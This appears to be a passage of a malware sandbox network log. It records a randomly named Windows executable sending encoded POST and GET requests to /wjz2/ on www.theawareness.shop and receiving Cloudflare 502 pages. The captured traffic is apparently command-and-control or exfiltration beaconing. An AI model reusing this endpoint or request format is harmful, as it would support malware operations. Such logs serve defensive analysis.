                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 74 68 65 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.theawareness.shop |
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.194988966 CEST1289INData Raw: 20 35 30 32 3a 20 42 61 64 20 67 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22
                                                                                                                                                                                                                        Data Ascii: 502: Bad gateway</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="vie
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195142031 CEST1289INData Raw: 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73 73 3d 22 20 72 65 6c 61 74 69 76 65 20 77 2d 31 2f 33 20 6d 64 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 35 20 6d 64 3a 70 2d 30 20 6d 64 3a 70 79 2d 38 20 6d
                                                                                                                                                                                                                        Data Ascii: div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"> <div class="relative mb-10 md:m-0
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195286036 CEST1289INData Raw: 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 64 3a 62 6c 6f 63 6b 20 77 2d 66
                                                                                                                                                                                                                        Data Ascii: -0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a href="https://www.cloudflare.com/5xx
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195380926 CEST1289INData Raw: 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 22 3e 0a 20 20 20 20 20 20
                                                                                                                                                                                                                        Data Ascii: ="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4">Wh
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195493937 CEST856INData Raw: 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e
                                                                                                                                                                                                                        Data Ascii: .16.192.225</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudfla


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        42192.168.11.2049834172.67.177.220805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.531770945 CEST840OUTPOST /wjz2/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.theawareness.shop
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.theawareness.shop
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.theawareness.shop/wjz2/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 55 63 57 6e 71 61 5a 35 35 50 65 51 79 6f 38 4b 34 4e 54 71 61 48 70 31 32 71 36 6d 37 2b 74 2f 77 2f 49 4b 70 6d 4e 50 53 62 58 6b 71 67 39 4c 49 61 34 4f 32 6f 49 57 48 5a 4c 69 59 36 48 77 41 72 53 75 66 57 70 49 77 5a 34 4f 53 6c 5a 62 50 52 67 75 75 42 4d 4d 49 7a 6c 48 32 51 58 74 6f 35 72 62 52 51 2f 69 71 45 34 34 30 59 56 58 48 57 6c 56 32 54 77 32 70 6a 41 77 66 41 2f 31 51 50 4e 32 2b 51 44 31 4e 77 79 36 6d 6a 35 68 54 39 42 55 6b 77 35 53 42 65 41 77 4d 4e 46 61 51 6d 4c 43 6c 35 71 59 49 68 72 4a 53 2b 72 36 36 2b 2f 55 36 37 55 32 4d 35 4c 49 5a 50 65 7a 70 61 55 35 4c 63 33 57 48 4b 65 30 31 33 6b 37 59 50 31 37 64 55 59 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=UcWnqaZ55PeQyo8K4NTqaHp12q6m7+t/w/IKpmNPSbXkqg9LIa4O2oIWHZLiY6HwArSufWpIwZ4OSlZbPRguuBMMIzlH2QXto5rbRQ/iqE440YVXHWlV2Tw2pjAwfA/1QPN2+QD1Nwy6mj5hT9BUkw5SBeAwMNFaQmLCl5qYIhrJS+r66+/U67U2M5LIZPezpaU5Lc3WHKe013k7YP17dUY=
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820482016 CEST1289INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:15 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 6366
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64TZ0ptVMBX8llmObBoHEa3pndw0Dqf4m5uHTAAb%2FKHAvFgpjp%2FOWDN6Op9d9g3fZCPurBPMfMsyPrO3IblRwD5VqHDlTZgPXu%2FdP5b2TuVCgTLTytDCWJG3Q8o4C1VjQ%2B3zHVhi1%2BU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73426969b142df-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94634&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 74 68 65 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.theawareness.sh
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820569992 CEST1289INData Raw: 6f 70 20 7c 20 35 30 32 3a 20 42 61 64 20 67 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54
                                                                                                                                                                                                                        Data Ascii: op | 502: Bad gateway</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name=
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820753098 CEST1289INData Raw: 20 20 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73 73 3d 22 20 72 65 6c 61 74 69 76 65 20 77 2d 31 2f 33 20 6d 64 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 35 20 6d 64 3a 70 2d 30 20 6d 64 3a 70 79
                                                                                                                                                                                                                        Data Ascii: <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"> <div class="relative mb-10 md
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820848942 CEST1289INData Raw: 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 64 3a 62 6c 6f 63 6b
                                                                                                                                                                                                                        Data Ascii: ight-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a href="https://www.cloudflare.com
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820858002 CEST1289INData Raw: 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 22 3e 0a 20 20
                                                                                                                                                                                                                        Data Ascii: lass="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820916891 CEST860INData Raw: 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73
                                                                                                                                                                                                                        Data Ascii: >154.16.192.225</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.clou


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        43192.168.11.2049835172.67.177.220805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.156327009 CEST1289OUTPOST /wjz2/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.theawareness.shop
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.theawareness.shop
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.theawareness.shop/wjz2/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 55 63 57 6e 71 61 5a 35 35 50 65 51 79 6f 38 4b 34 4e 54 71 61 48 70 31 32 71 36 6d 37 2b 74 2f 77 2f 49 4b 70 6d 4e 50 53 62 50 6b 72 57 42 4c 53 39 4d 4f 33 6f 49 57 4a 35 4c 6e 59 36 48 49 41 72 4b 71 66 57 56 69 77 62 77 4f 53 48 68 62 45 44 49 75 67 42 4d 4d 56 6a 6c 4b 79 51 58 43 6f 35 37 66 52 55 54 69 71 45 34 34 30 65 78 58 42 48 6c 56 78 6a 77 31 75 6a 41 38 62 41 2b 63 51 50 46 6d 2b 51 32 43 52 54 71 36 6e 44 70 68 56 50 5a 55 73 77 35 51 45 65 41 6f 4d 4e 41 45 51 69 72 30 6c 35 33 2f 49 6d 58 4a 53 35 53 52 6a 36 7a 76 76 6f 39 38 41 39 4c 54 57 4d 2b 54 30 4c 59 58 62 4e 2b 34 4e 66 2b 74 79 68 39 77 46 36 74 74 42 78 78 50 36 54 50 67 35 41 6c 33 37 30 48 6d 59 50 4f 4a 66 6b 41 35 69 7a 6c 33 50 49 54 43 57 6e 44 35 35 66 6a 41 42 6f 71 74 48 50 35 31 74 6c 67 63 2f 64 67 48 77 32 6b 62 46 69 56 42 2f 6c 4f 38 41 5a 64 53 36 53 4d 67 43 77 4d 4a 2f 30 4d 69 71 70 50 41 5a 61 66 71 71 73 52 4f 54 33 75 57 38 4a 7a 66 58 39 45 43 30 68 78 74 61 31 55 48 38 35 75 76 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=UcWnqaZ55PeQyo8K4NTqaHp12q6m7+t/w/IKpmNPSbPkrWBLS9MO3oIWJ5LnY6HIArKqfWViwbwOSHhbEDIugBMMVjlKyQXCo57fRUTiqE440exXBHlVxjw1ujA8bA+cQPFm+Q2CRTq6nDphVPZUsw5QEeAoMNAEQir0l53/ImXJS5SRj6zvvo98A9LTWM+T0LYXbN+4Nf+tyh9wF6ttBxxP6TPg5Al370HmYPOJfkA5izl3PITCWnD55fjABoqtHP51tlgc/dgHw2kbFiVB/lO8AZdS6SMgCwMJ/0MiqpPAZafqqsROT3uW8JzfX9EC0hxta1UH85uvApyhrZ6bmQ+wNS+WpeSaRpkPc2IVj3y2s1qk6eThpf+FjT5oUtwhJOdaXvbLAdohIlRL03c5pIfak4fr7BOSg4RRaHcShkiONNAEREhTKA9jzBsm+EgXwZOIED7xM3LCPOjMflWsEJa9wlrw0YUMEHZG0+4vY3536EOBwj7O9yAU7m8UMvBc9tG/4pYGa1ZuJM6STSyyCaqADalCc7Zxc39IwGlzPz82ZEO6PjLD5pRU6EmYoZGzwCqbjWGuKNKMogthCjN0mbyNPCEpnH7b/B3q5Vp70ekTG9mgL2sbFBFJ+esKWtDWBDka3pnQNs1bKlj2aWzsnJCR
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.156388044 CEST6700OUTData Raw: 73 72 51 56 52 77 35 68 5a 30 69 39 38 71 48 7a 4a 49 7a 71 38 53 58 69 61 6f 2f 61 48 33 76 78 69 33 53 67 33 59 63 75 6d 78 51 6e 5a 76 47 56 4f 4b 33 56 51 41 38 6f 41 48 66 6c 66 72 31 4e 4f 71 45 2f 76 73 76 79 77 6b 63 59 32 76 75 69 54 65
                                                                                                                                                                                                                        Data Ascii: srQVRw5hZ0i98qHzJIzq8SXiao/aH3vxi3Sg3YcumxQnZvGVOK3VQA8oAHflfr1NOqE/vsvywkcY2vuiTeLo0+1LM30yzlL2YjC9KbxKhHh/C7MMF2s5RI2elu7R7mV+Dl6pwiiEo+ghX1oAepBNgt6/fOjwggD5pfwBrAZUf46rSIV5twPBtY6K/tZgMmf+1kjnIs9u1byb9OKgzXmxB4zmSdqjEu3ormSdkuk6FceEoO0Vqj6
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.429986000 CEST1289INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:18 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 6366
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ps45tChglZ2u9xbRerdTi1NQrjSKwz3bqrrUpbVQUAxf4%2FMqaVmx8iN9iImuG1ZzSN9oEseRbc%2BWIZo7p7jePbdNmADu3w5dvddjak5ax5tU%2Fh5MXfgF6n8ToEjEuxPmjaFq4uR16Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d734279cce278d0-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94603&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7989&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 74 68 65 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.theawareness.shop
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430042028 CEST1289INData Raw: 7c 20 35 30 32 3a 20 42 61 64 20 67 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65
                                                                                                                                                                                                                        Data Ascii: | 502: Bad gateway</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430166006 CEST1289INData Raw: 3c 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73 73 3d 22 20 72 65 6c 61 74 69 76 65 20 77 2d 31 2f 33 20 6d 64 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 35 20 6d 64 3a 70 2d 30 20 6d 64 3a 70 79 2d 38 20
                                                                                                                                                                                                                        Data Ascii: <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"> <div class="relative mb-10 md:m-
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430263996 CEST1289INData Raw: 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 64 3a 62 6c 6f 63 6b 20 77 2d
                                                                                                                                                                                                                        Data Ascii: t-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a href="https://www.cloudflare.com/5x
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430310965 CEST1289INData Raw: 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 22 3e 0a 20 20 20 20 20
                                                                                                                                                                                                                        Data Ascii: s="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4">W
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430430889 CEST857INData Raw: 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e
                                                                                                                                                                                                                        Data Ascii: 4.16.192.225</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudfl


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        44192.168.11.2049836172.67.177.220805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.778458118 CEST539OUTGET /wjz2/?2rul-=Ze+HptNr85yw14c+us2AC2dw1a7i9e00/foFqz1kUabDhzphc/VO6YYTNbrnHL/5cJOwek587J0vYmBCPQ4ypnI0Vgcg70qX2rjEYXT5uSwLlvVTAHZgxGM=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.theawareness.shop
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
